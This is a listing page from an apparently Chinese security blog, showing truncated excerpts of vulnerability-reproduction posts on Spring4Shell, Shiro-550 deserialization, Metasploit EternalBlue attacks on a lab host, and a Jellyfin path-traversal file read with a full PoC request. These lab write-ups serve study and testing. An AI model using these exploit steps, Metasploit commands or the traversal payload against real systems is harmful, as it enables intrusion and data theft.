2022-03-31 Spring Rce CVE-2022-22965 Spring Rce CVE-2022-22965 漏洞介绍继2021年底由阿里发现的Log4j的严重漏洞之后, Spring框架也被发现了一个重大的安全漏洞。目前这个漏洞的名称被称为“SpringShell: Spring Core RCE 0-day Vulnerability”。漏洞版本JDK 9及以上版本 使用Tomcat 服务器 以war 部署运行 使用了spring-webmvc或 spring-webflux Spring框架版本是 5.3.0 到 5.3.17, 5.2.0 到 5.2.19,以及更旧的版本。原理Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器方法中参数对象的成员变量,攻击者通过构造恶意请求获取 AccessLogValve 对象并注恶意字段值触发 pipeline 机制可写任意路径下的文件。利用步骤覆盖 Tomcat 特定的ClassLoader属性,将访问日志文件路径更改为 web根目录下的某个位置,并将日志模式(写入的数据)更改为包含 webshell 代码的常量模式。这会导致JSP_webshell被放到web 根目录下。向写入的 webshell 发送查询... admin 2022-03-31 漏洞复现 1,845 阅读 0 评论 2022年03月31日 1,845 阅读 0 评论
2022-03-11 apache shiro-550 apache shiro-550 漏洞详情shiro反序列化原因是shiro的一个机制为了让浏览器或服务器重启后不丢失用户的登陆状态,会将用户信息保存到 rememberMe字段中 然后发送到服务端,服务端再对它进行base64解密,aes解密,再进行反序列化,由于在 1.2.4 这个版本里 shiro的key是固定的,所以可以通过构造一段恶意类经过aes加密再base64加密然后放到 rememberMe 伪造cookie信息,来让服务端加载,进而触发反序列化漏洞详细步骤:1.首先正常登录,然后生成带有rememberme的返回cookie值。2.生成cookie,shiro会提供rememberme功能,可以通过cookie记录登录用户,从而记录登录用户的身份认证信息,即下次无需登录即可访问。处理rememberme的cookie的类为org.apache.shiro.web.mgt.CookieRememberMeManager3.之后进入serialize,对登录认证信息进行序列化4.然后加密,调用aes算法。5.加密结束,然后在在org/apache/shiro/web/mgt/CookieRememb... admin 2022-03-11 漏洞复现 1,311 阅读 0 评论 2022年03月11日 1,311 阅读 0 评论
2022-02-28 MSF内网渗透实战 MSF内网渗透实战 渗透边界机msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.2.242 rhosts => 192.168.2.242 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.2.200:10000 [*] 192.168.2.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.2.242:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.2.242:445 - Scanned 1 of 1 hosts (100% complete) [+] 19... admin 2022-02-28 内网渗透,渗透测试 1,370 阅读 0 评论 2022年02月28日 1,370 阅读 0 评论
2022-02-27 MS17-010渗透实战 MS17-010渗透实战 利用MS17-010渗透win7使用模块:msf6 > use auxiliary/scanner/smb/smb_ms17_010查看配置信息:msf6 auxiliary(scanner/smb/smb_ms17_010) > show options设置目标IPset rhost 192.168.2.242进行扫描:(需要关闭防火墙)msf6 auxiliary(scanner/smb/smb_ms17_010) > run [+] 192.168.2.242:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.2.242:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ###存在“永恒之蓝”漏洞###漏洞利用模块msf6 > use e... admin 2022-02-27 内网渗透,渗透测试 1,049 阅读 0 评论 2022年02月27日 1,049 阅读 0 评论
2022-02-17 jellyfin-任意文件读取 漏洞复现 jellyfin-任意文件读取 漏洞复现 可以通过访问http:///Audio/anything/hls/<文件路径>/stream.mp3/http:///Audio/anything/hls/<文件路径>/stream.aac/读取任意文件。影响版本:Jellyfin<10.7.1漏洞复现:利用POC:GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/ HTTP/1.1 Host: 127.0.0.1:8096 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh... admin 2022-02-17 漏洞复现 789 阅读 0 评论 2022年02月17日 789 阅读 0 评论